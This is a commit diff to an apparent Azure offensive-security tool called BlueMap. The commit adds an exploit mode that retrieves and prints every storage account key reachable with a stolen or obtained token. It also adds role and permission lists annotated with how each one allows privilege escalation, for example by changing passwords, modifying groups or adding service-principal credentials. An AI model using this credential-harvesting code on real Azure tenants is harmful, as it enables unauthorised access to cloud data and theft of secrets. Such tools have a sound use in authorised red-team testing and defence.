STRLCPY/BlueMap

Added new roles for detection
RootInj3c committed 2 years ago

eb5eb1d2

1 parent a0895140

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

■ ■ ■ ■ ■ ■

bluemap.py

		skipped 15 lines
16	16		Token = None
17	17		accessTokenGraph = None
18	18		accessTokenVault = None
	19	+	storageAccessToken = None
19	20		TotalTargets = []
20	21		TargetSubscription = None
21	22		TargetTenantId = None
		skipped 166 lines
188	189		hasGraphAccess = False
189	190		hasVaultEnabled = False
190	191		Token = token
191		-	listSubs = ListSubscriptionsForToken()
192		-	TargetSubscription = listSubs['value'][0]['subscriptionId']
193		-	TargetTenantId = parseTenantId()
	192	+	try:
	193	+	listSubs = ListSubscriptionsForToken()
	194	+	TargetSubscription = listSubs['value'][0]['subscriptionId']
	195	+	TargetTenantId = parseTenantId()
	196	+	except KeyError:
	197	+	pass
194	198
195	199
196	200		def originitToken(token):
		skipped 55 lines
252	256		result.append(item)
253	257		return result
254	258
	259	+	def ContainerACL(storageAccount):
	260	+	global storageAccessToken
	261	+	r = sendGETRequest("https://"+storageAccount+".blob.core.windows.net/dev?restype=container&comp=acl", accessTokenGraph)
	262	+	return r["status_code"]
	263	+
255	264		def RD_ListAllUsers():
256	265		global accessTokenGraph
257	266		r = sendGETRequest("https://graph.microsoft.com/v1.0/users/", accessTokenGraph)
		skipped 185 lines
443	452		item['resourceGroup'] = res['name']
444	453		result.append(item)
445	454		return result
	455	+	def RD_ListAllStorageAccountsKeys(AccId):
	456	+	global Token
	457	+	r = sendPOSTRequest("https://management.azure.com/"+AccId+"/listKeys?api-version=2022-05-01", None, Token)
	458	+	return r['json']
	459	+
446	460		def RD_ListAllStorageAccounts():
447	461		global Token
448	462		result = []
		skipped 2 lines
451	465		for res in getResGroup(sub['subscriptionId'])['value']:
452	466		rsVM = sendGETRequest("https://management.azure.com/subscriptions/"+sub['subscriptionId']+"/resourceGroups/"+res['name']+"/providers/Microsoft.Storage/storageAccounts?api-version=2021-09-01", Token)
453	467		for item in rsVM['json']['value']:
	468	+
454	469		item['subscriptionId'] = sub['subscriptionId']
455	470		item['resourceGroup'] = res['name']
456	471
		skipped 237 lines
694	709		vaultAbuseCertAndKeysOnlyRoles = ["Key Vault Certificates Officer", "Key Vault Crypto Officer"]
695	710		shadowRisks = ["Cloud Application Administrator", "Application Administrator", "Password Administrator",
696	711		"Privileged Authentication Administrator", "Authentication Administrator",
697		-	"Privileged Role Administrator", "User Account Administrator", "User Administartor",
698		-	"Helpdesk Administartor"]
	712	+	"Privileged Role Administrator", "User Account Administrator", "User Administrator", "User Access Administrator",
	713	+	"Helpdesk Administrator", "Directory Synchronization Accounts", "Hybrid Identity Administrator"]
699	714		classicAdministartors = ["Account Administrator", "Service Administrator", "Co-Administrator"]
700	715		if currentRoleName in vaultAbuseRoles:
701	716		return currentRoleName + "\|" + "allows to retrieve secrets from key vault."
		skipped 7 lines
709	724		return currentRoleName + "\|" + "Can read everything in Azure AD, without the ability to update."
710	725		elif currentRoleName == "Global Administrator" or currentRoleName == "Company Administrator":
711	726		return currentRoleName + "\|" + "has a god mode, which can manage all aspects of Azure AD. (think like Domain Admin)"
	727	+	elif currentRoleName == "User Administrator" or currentRoleName == "Groups Administrators" or currentRoleName == "Directory Writers":
	728	+	return currentRoleName + "\|" + "has permissions to modify group membership in Azure AD."
712	729		elif currentRoleName == "Virtual Machine Contributor":
713	730		return currentRoleName + "\|" + "allows manage of VMs including disks, snapshots, extensions, and password restoration."
714	731		elif currentRoleName == "Automation Operator" or currentRoleName == "Automation Contributor":
		skipped 3 lines
718	735		elif currentRoleName == "User Access Administrator":
719	736		return currentRoleName + "\|" + "has manage access to all resources within the subscription."
720	737		elif currentRoleName in shadowRisks:
721		-	return currentRoleName + "\|" + " has full directory admin rights, easy way to esclate."
	738	+	return currentRoleName + "\|" + " has full directory admin rights, easy way to esclate (i.e. use change password)."
722	739		elif currentRoleName in classicAdministartors:
723	740		return currentRoleName + "\|" + "Is found as one of the three classic subscription administrative roles. Please notice: Service Administrator and Account Administrator are equivalent to the Owner role in the subscription."
724	741		elif currentRoleName == "Owner":
		skipped 18 lines
743	760		"Microsoft.Storage/listServiceSas/action"]
744	761		ARMTemplateAbuse = ["Microsoft.Resources/deployments/*"]
745	762		DirectoryAbuse = ["Microsoft.Resources/deployments/*"]
	763	+	AllowGroupModify = ["microsoft.directory/groups/members/update"]
	764	+	AllowUserCreation = ["microsoft.directory/users/create"]
	765	+	allowsSPCreation = ["microsoft.directory/servicePrincipals/create"]
	766	+	allowsSPUpdate = ["microsoft.directory/servicePrincipals/credentials/update"]
746	767		ExtensionsAbuse = ["Microsoft.ClassicCompute/virtualMachines/extensions/*",
747	768		"Microsoft.Compute/virtualMachines/extensions/read",
748	769		"Microsoft.Compute/virtualMachines/extensions/write"]
		skipped 10 lines
759	780		return "" + "\|" + "That's means to have a Contributor/Owner permission on resources."
760	781		elif currentPermission in vmPermissions:
761	782		return currentPermission + "\|" + "allows execute code on Virtual Machines."
	783	+	elif currentPermission in allowsSPCreation:
	784	+	return currentPermission + "\|" + "allows creation of new application registration (service principle)."
	785	+	elif currentPermission in allowsSPUpdate:
	786	+	return currentPermission + "\|" + "allows add service principle for an existing application registration."
	787	+	elif currentPermission in AllowGroupModify:
	788	+	return currentPermission + "\|" + "allows modify group membership in Azure AD."
	789	+	elif currentPermission in AllowUserCreation:
	790	+	return currentPermission + "\|" + "allows new user creation in Azure AD."
762	791		elif currentPermission in vmAllowDeployPermission:
763		-	return currentPermission + "\|" + "allows VM deployment or configuraiton of existing VM."
	792	+	return currentPermission + "\|" + "allows VM deployment or configuration of existing VM."
764	793		elif currentPermission in StorangeAccountAbuse:
765	794		return currentPermission + "\|" + "can abuse storage accounts (i.e., view blobs)."
766	795		elif currentPermission in ARMTemplateAbuse:
		skipped 242 lines
1009	1038		print(banner)
1010	1039		'''
1011	1040		supportedCommands = [
1012		-	"test",
1013	1041		"whoami",
1014	1042		"scopes",
1015	1043		"get_subs",
		skipped 29 lines
1045	1073		"Reader/ListAppServiceSites",
1046	1074		"Reader/ListVirtualMachines",
1047	1075		"Reader/ListAllStorageAccounts",
	1076	+	"Reader/ListStorageAccountsKeys",
1048	1077		"Reader/ARMTemplatesDisclosure",
1049		-	"Reader/ListServicePrincipal",
	1078	+	"Reader/ListServicePrincipals",
1050	1079		"Reader/abuseServicePrincipals",
1051	1080		"Contributor/ListACRCredentials",
1052	1081		"Contributor/ReadVaultSecret",
		skipped 23 lines
1076	1105		print("Use run command only within an exploit.")
1077	1106		elif mode == "whoami":
1078	1107		currentProfile()
1079		-	elif mode == "test":
1080		-	x = sendGETRequest("https://management.azure.com/subscriptions/?api-version=2017-05-10", Token)
1081		-	print(dict(x['headers'])['Content-Type'])
1082	1108		elif mode == "scopes":
1083	1109		currentScope()
1084	1110		elif mode == "get_subs" or mode == "subs":
		skipped 459 lines
1544	1570		)
1545	1571		AllStorageAccountRecordsCount += 1
1546	1572		print(make_table(field_names, rows))
	1573	+	elif "Reader/ListStorageAccountsKeys" in ExploitChoosen and mode == "run":
	1574	+	print("Trying to list all storage accounts keys.. (it might take a few minutes)")
	1575	+	if len(RD_ListAllStorageAccounts()) < 1:
	1576	+	print("No Storage Accounts were found.")
	1577	+	else:
	1578	+	field_names = ["#", "Name", "Location", "Type", "Key", "Value", "Permissions", "Resource Group"]
	1579	+	rows = []
	1580	+	AllStorageAccountRecordsCount = 0
	1581	+	for SARecord in RD_ListAllStorageAccounts():
	1582	+	Data = RD_ListAllStorageAccountsKeys(SARecord['id'])
	1583	+	for key in Data['keys']:
	1584	+	rows.append(
	1585	+	{"#": AllStorageAccountRecordsCount,
	1586	+	"Name": SARecord['name'],
	1587	+	"Location": SARecord['location'],
	1588	+	"Type": SARecord['type'],
	1589	+	"Key": key['keyName'],
	1590	+	"Value": key['value'],
	1591	+	"Permissions": key['permissions'],
	1592	+	"Resource Group": SARecord['resourceGroup']
	1593	+	}
	1594	+	)
	1595	+	AllStorageAccountRecordsCount += 1
	1596	+	print(make_table(field_names, rows))
1547	1597		elif "Reader/ListAllVaults" in ExploitChoosen and mode == "run":
1548	1598		print("Trying to list all vaults.. (it might take a few minutes)")
1549	1599		if len(RD_ListAllVaults()) < 1:
		skipped 49 lines
1599	1649		)
1600	1650		AllVMRecordsCount += 1
1601	1651		print(make_table(field_names, rows))
1602		-	elif "Reader/ListServicePrincipal" in ExploitChoosen and mode == "run":
	1652	+	elif "Reader/ListServicePrincipals" in ExploitChoosen and mode == "run":
1603	1653		print("Trying to enumerate all service principles (App registrations)..")
1604	1654		if len(RD_AddAppSecret()) < 1:
1605	1655		print("No Apps registrations were found.")
		skipped 281 lines

■ ■ ■ ■ ■ ■

requirements.txt

1 + requests~=2.28.1
2 + prettytable~=3.4.1
3 + pyreadline3

All occurrences

1	+	requests~=2.28.1
2	+	prettytable~=3.4.1
3	+	pyreadline3

Added new roles for detection